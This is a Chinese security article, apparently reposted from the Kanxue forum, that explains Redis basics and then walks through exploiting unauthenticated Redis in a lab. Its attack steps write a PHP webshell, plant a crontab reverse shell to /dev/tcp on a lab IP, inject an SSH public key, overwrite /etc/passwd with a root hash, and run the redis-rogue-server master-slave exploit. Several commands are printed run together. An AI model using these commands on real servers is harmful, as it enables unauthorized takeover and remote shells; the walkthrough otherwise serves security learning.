Redis常见利用方法
2023-2-1 18:5:12 Author: 看雪学苑(查看原文) 阅读量:13 收藏


本文为看雪论坛优秀文章
看雪论坛作者ID:UzJu


1、Redis常见端口
  • 6379
Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库,其具备如下特性:
  • 基于内存运行,性能高效
  • 支持分布式,理论上可以无限扩展
  • key-value存储系统
  • 开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API
2、Redis数据结构

3、Redis为什么快?

(1)完全基于内存操作

(2)C语言实现,优化过的数据结构,性能高

(3)单线程,无切换上下文的成本

(4)异步非阻塞IO(多路复用IO)

4、Redis在Linux和Windows下有区别吗?

(1)从多路复用IO来看
Redis中地方调用Linux的epoll方法来实现多路复用,而在Windows系统是没有epoll方法的,Windows下对应的是IOCP模型,
(2)从Redis如何进行持久化来看
  • RDB 快照,内存数据的二进制序列化文件
  • AOF 日志,修改内存数据的指令记录文本
RDB持久化的手动备份命令是bgsave,AOF文件过大的重写命令是bgrewriteaof。
原理都是开辟一个子进程对内存进行处理(注意了是子进程,不是子线程),这就涉及到操作系统的机制了。
Redis通过Linux系统的fork函数创建子进程,共享内存里面的代码段和数据段,从而实现了持久化。
然而Windows系统是没有fork函数的。

环境搭建

Docker
里使用docker快速启动Redis:
docker search redis
docker pull redis
启动容器
docker run -itd run -p 6379:6379 -d redis

手动安装:

wget http://download.redis.io/releases/redis-3.2.11.tar.gztar -zxvf redis-3.2.11.tar.gzvim redis.confmake
protected-mode的yes修改为No:
注释 bind 127.0.0.1
cp ./redis-server /usr/local/bin/

采坑:

如果遇到这个,就用make编译,首先卸载原来的apt安装的版本
  apt remove redis-server
然后make编译就可以了。


Windows
https://github.com/microsoftarchive/redis/releases

Linux

wget http://download.redis.io/redis-stable.tar.gztar -xzvf redis-stable.tar.gzcd redis-stablemakecp src/redis-cli /usr/local/bin/

MacOs

brew tap ringohub/redis-clibrew install redis-cli


Redis 默认情况下,会绑定 .0.0.0.0:6379 ,如果没有才有相关的策略,比如添加防火墙规则避免其他非信任来源 限制ip访问等,那么就会将 Redis 服务暴露到公网上。如果没有设置密码认证的话(一般为空),会导致任意用户在可以访问目标服务器的情况下,未授权访问 Redis 以及 读取 Redis 的数据。
在未授权的情况下,可以利用 Redis 自身提供的 config 命令进行写入shell、写SSH公钥、创建计划任务反弹shell 等。其思路都是先将 Redis 的本地数据库存放目录设置为 特定的目录,然后将 dbfilename \(本地数据库文件名\) 设置为你想写入的文件名称,最后在执行 save 或 bgsave 保存,那么就看在制定的目录下写入指定的文件了。
redis-cli -h ip //无需密码登录redis-cli -h host -p port -a password   //使用redis密码登入redis服务info
首先先来看一下info中有哪些信息:

(1)写WebShell

原理:
在数据库中插入一条Webshell数据,将此Webshell的代码作为value,key值随意(x),然后通过修改数据库的默认路径为/www/wwwroot/html和默认的缓冲文件shell.php,把缓冲的数据保存在文件里,这样就可以在服务器端的/www/wwwroot/html下生成一个Webshell。
条件:
  • redis和网站要在同一台服务器下
  • 知道网站根目录的绝对路径
  • 运行redis服务的用户必须有权限向目录写文件
利用方法:
将dir设置为/www/wwwroot/html,将指定本地数据库存放目录设置为/www/wwwroot/html;将dbfilename设置为文件名shell.php,即指定本地数据库文件名为shell.php;再执行save或bgsave,则我们就可以写入一个路径为/www/wwwroot/html/shell.php的Webshell文件。
首先我们在服务器的根目录中创建一个/www/root的文件夹并用python启动一个临时的HTTP服务。
获取当前路径
  Config get dir
设置/www/root为指定目录
  Config set dir
写入文件
Set abc "\n\n<?php phpinfo();?>" //写入,这里还有一种写法:set abc”\n\n<xxx>”nx,末尾的nx代表仅当键abc不存在的时候,才会创建。这样可以防止误更新到业务在用的键名,引发业务的异常。
设置写文件
  Config set dbfilename test.php
随后尝试访问:
这里是肯定不会解析的,因为只是一个HTTP服务,可以看到目录下也有test.php,成功写入:
ps: 来自Tatsumaki大佬的博客

2、写Crontab

条件:
  • 访问目标服务器的redis不需要密码
  • redis对/var/spool/cron有写入权限
Ubuntu
Config set dir /var/spool/cronset abcd "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.13/1234 0>&1\n\n"Config set filename rootSave
在Ubuntu中尝试之后,发现并没有反弹shell回来,不知道为什么,查询了文章看到有大佬说:
这个方法只能在Centos上使用,Ubuntu上是行不通的,原因如下:因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/<username>权限必须是600也就是-rw———-才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/<username>权限644也能执行
所以这里更换Centos尝试,搭建步骤与上文一致,发现centos确实在1分钟左右就返回了shell:
按照上面CentOs和Ubuntu写文件的说法,可以来看一下写入的文件权限大小。
Linux权限对应表:

可以看到CentOs中的是644:
Ubuntu中也是644,那么如果真如那篇文章所说,必须是600才会执行的话,那么确实Ubuntu无法执行(

3、写SSH公钥

条件:
  • Redis服务使用root启动
  • 服务器开启了SSH,但是允许密钥登录
这里就用Centos7搭建的redis作为环境。
首先配置ssh密钥登录:
vi /etc/ssh/sshd_config RSAAuthentication yes # 开启密钥登入的认证方式 PubkeyAuthentication yes # 开启密钥登入的认证方式 PermitRootLogin yes # 此处请留意 root 用户能否通过 SSH 登录,默认为yes # 可以正常用密钥登录了,再把这里改为noPasswordAuthentication yes #当我们完成全部设置并以密钥方式登录成功后,可以禁用密码登录。这里我们先不禁用,先允许密码登陆
然后重启sshd服务:
  systemctl restart sshd
随后尝试连接会提示:

随后在Mac上生成密钥:
ssh-keygen -t rsa
设置.ssh目录
Config set dir /root/.ssh/
写入公钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txtcat /root/.ssh/key.txt | redis-cli -h 192.168.0.148 -x set xxx # Mac(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > ./key.txtcat /root/.ssh/key.txt | redis-cli -h 192.168.0.148 -x set xxx
随后就可以使用shh直接连接了:

4、重置Linux账户密码

原理:
若/etc/passwd和/etc/shadow中同时存在密码,系统会使用/etc/passwd中的密码进行验证 /etc/passwd-是/etc/passwd的备份,成功登录系统后,通过替换/etc/passwd-文件,可以恢复root用户的原密码。
Linux存账户密码一般会有/etc/passwd和/etc/shadow,如果两个出现冲突的话,会以/etc/passwd为准。
另外,/etc/passwd的权限一般是644,比/etc/shadow的640要高。而且,redis写入是覆盖的,也就是说,写入进去覆盖之后,其他的都没了,这个过程是有创且不可逆的。
这里用到一个大佬的dockerfile: https://github.com/justonly1/DockerRedis
或者docker直接下载也可以:
docker pull ju5ton1y/redis:latestdocker run -itd -p 6379:6379 -p 6378:22 ju5ton1y/redis:latest# 启动之后需要进入容器/etc/init.d/ssh restart
随后生成一串密码为YourNewPasswd%1024的密文。
另外这段代码
python -c 'import crypt; print crypt.crypt("YourNewPasswd%1024","$6$my0salt0")'
mac下会这样:
在kali下就好了:
然后写入/etc/passwd
  SET abcd "\n\n root:$6$my0salt0$yCCi..OsWo8n5MaBFytGaZ0qTcHErSaoyvAVvMXFEnwgMOtpm6sYbtwUR4I.GA7Kt0X0KruYifS6c9.FkDN53.:0:0:root:/root:/bin/bash\nsshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin\n\n"
config set dbfilename passwdsave
然后就可以使用YourNewPasswd%1024这个密码登录了:

2、主从备份

这里用vulhub的靶场
git clone https://github.com/vulhub/vulhub.gitcd redis/4-unacc/docker-compose up -d
exp用这个https://github.com/n0b0dyCN/redis-rogue-server.git
git clone https://github.com/n0b0dyCN/redis-rogue-server.gitpython3 redis-rogue-server.py --rhost 192.168.0.13 --lhost 192.168.0.139# rhost是redis,lhost是kali
这执行的时候会遇到错误:

多跑几次就行:
  • https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
  • https://www.1024sou.com/article/611764.html
  • https://tatsumaki.cn/2020/08/20/redis/#toc-heading-5
  • https://www.freebuf.com/articles/web/325035.html
  • https://tatsumaki.cn/2020/08/20/redis/#toc-heading-9

看雪ID:UzJu

https://bbs.pediy.com/user-home-809626.htm

*本文由看雪论坛 UzJu 原创,转载请注明来自看雪社区

# 往期推荐

1.一道pwn题解析之jarvisoj_fm

2.Windows内核模糊测试之IoControl Fuzz

3.某RCE漏洞复现、排查与监测

4.Linux内核pwn之基础rop提权

5.【漏洞复现】DedeCMS v5.7 SP2_任意修改前台用户密码

6.tcache bin利用总结

球分享

球点赞

球在看

点击“阅读原文”,了解更多!


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NTc2MDYxMw==&mid=2458493241&idx=1&sn=00de9eb59affd0dfd349dd024aa20eea&chksm=b18e91b386f918a53a2cc1c14ff1b4ff68ce977bb6235fc9df9c6003aac611d0a706e01a5f86#rd
如有侵权请联系:admin#unsafe.sh